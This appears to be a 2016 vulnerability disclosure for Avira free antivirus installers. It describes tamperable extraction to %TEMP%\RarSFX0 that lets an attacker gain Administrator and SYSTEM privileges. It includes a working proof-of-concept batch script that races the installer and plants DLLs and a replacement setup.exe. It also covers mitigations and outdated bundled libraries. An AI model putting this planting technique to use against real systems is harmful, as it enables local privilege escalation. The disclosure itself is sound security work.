Hi @ll,

Avira's free antivirus full package executable installers,
avira_antivirus_en-us.exe, avira_antivirus_de-de.exe etc.,
available from
<https://www.avira.com/en/download/product/avira-free-antivirus>,
<https://www.avira.com/de/download/product/avira-free-antivirus>
etc., have multiple vulnerabilities:


1. the full package executable installers (really: self-
   extracting RAR archives) extract their payload (the real
   installer) into the directory "%TEMP%\RarSFX0\"

This directory is NOT protected against tampering, i.e. the
extracted payload can be replaced by an unprivileged attacker
who has access to the respective user account, or by malware
already running under this user account.


2. after extraction the self-extractor starts the unpacked
   "%TEMP%\RarSFX0\presetup.exe" ELEVATED, eventually
   displaying an UAC prompt.

An unprivileged attacker who modified "%TEMP%\RarSFX0\presetup.exe"
between extraction and execution can trick the user to start a
rogue program with administrative privileges.


3. "%TEMP%\RarSFX0\presetup.exe" loads multiple (system) DLLs
   from its application directory "%TEMP%\RarSFX0\", and starts
   several programs, for example "%TEMP%\RarSFX0\setup.exe".

All these DLLs and programs are executed with administrative
privileges too; an unprivileged attacker who (re)placed these
files in "%TEMP%\RarSFX0\" gains escalation of privilege to
"Administrator".


4. "%TEMP%\RarSFX0\setup.exe" installs several Windows services
   which run under the SYSTEM account.

An unprivileged attacker who replaced the service executables in
"%TEMP%\RarSFX0\" gains escalation of privilege to "SYSTEM".


Proof of concept:
~~~~~~~~~~~~~~~~~

1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>
   and <http://home.arcor.de/skanthak/download/SENTINEL.EXE>
   and save them in your "Downloads" directory;

2. create the following batch script in an arbitrary directory:

--- POC.CMD ---
:WAIT_DLL
@If Not Exist "%TEMP%\RarSFX0" Goto :WAIT_DLL

For %%! In (UXTheme Version DWMAPI) Do @Copy "%USERPROFILE%\Downloads\SENTINEL.DLL" "%TEMP%\RarSFX0\%%!.DLL"

:WAIT_EXE
@If Not Exist "%TEMP%\RarSFX0\setup.exe" Goto :WAIT_EXE

Copy "%USERPROFILE%\Downloads\SENTINEL.EXE" "%TEMP%\RarSFX0\setup.exe"
--- EOF ---

3. download "avira_antivirus_en-us.exe" and save it in your
   "Downloads" directory;

4. start the batch script POC.CMD;

5. start the downloaded "avira_antivirus_en-us.exe" and notice
   the message boxes displayed from the DLLs and EXE placed in
   "%TEMP%\RarSFX0\" by POC.CMD

PWNED!


Mitigations:
~~~~~~~~~~~~

* Don't use executable installers! NEVER!

* Don't use crapware which runs executables from unsafe
  directories like %TEMP%!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of "%TEMP%"; use
  <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to
  decode it to "deny execution of files in this directory for
  everyone, inheritable to all files in all subdirectories".


stay tuned
Stefan Kanthak


PS: of course Avira's anti-virus has some more beginner's errors:
    outdated and vulnerable 3rd-party libraries!

    - libcurl.dll 7.39.0
      the current version is 7.50.1, with MULTIPLE fixed vulnerabilties;
      see <https://curl.haxx.se/docs/vulnerabilities.html>

    - ssleay32.dll and libeay32.dll 1.0.2.5 from OpenSSL 1.0.2e
      the current version is 1.0.2h, with MULTIPLE fixed vulnerabilities;
      see <https://openssl.org/news/vulnerabilities.html>


Timeline:
~~~~~~~~~

2016-07-15    vulnerability report sent to vendor

              NO RESPONSE, not even an acknowledgement of receipt

2016-08-29    report published